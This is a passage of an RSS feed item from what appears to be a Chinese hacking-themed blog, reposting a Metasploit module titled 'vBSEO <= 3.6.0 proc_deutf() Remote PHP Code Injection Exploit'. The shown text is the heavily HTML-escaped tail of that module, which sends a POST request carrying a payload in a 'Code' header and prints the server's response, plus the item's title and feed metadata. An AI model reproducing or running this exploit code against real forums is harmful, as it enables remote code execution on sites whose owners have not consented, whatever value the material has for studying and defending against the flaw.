sp;&amp;nbsp;&amp;nbsp;&amp;#39;method&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;#39;POST&amp;#39;,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;uri&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;uri,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;data&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;data,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;headers&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;{&amp;nbsp;&amp;#39;Code&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;p&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;})&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print_status(&amp;quot;%s&amp;quot;&amp;nbsp;%&amp;nbsp;response.body)&amp;nbsp;if&amp;nbsp;datastore[&amp;#39;CMD&amp;#39;]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;end&amp;nbsp;&lt;br&gt;&lt;br&gt;end&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220394/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1798&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1798</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1798</wfw:commentRss><description>&lt;p id=fp&gt;&lt;strong&gt;vBSEO&amp;nbsp;&amp;lt;=&amp;nbsp;3.6.0&amp;nbsp;&amp;quot;proc_deutf()&amp;quot;&amp;nbsp;Remote&amp;nbsp;PHP&amp;nbsp;Code&amp;nbsp;Injection&amp;nbsp;Exploit&lt;/strong&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;require&amp;nbsp;&amp;#39;&amp;#39;msf/core&amp;#39;&amp;#39;&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220394/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1798&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1798#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1798</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1798</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220394/1477126</fs:itemid></item></channel></rss>
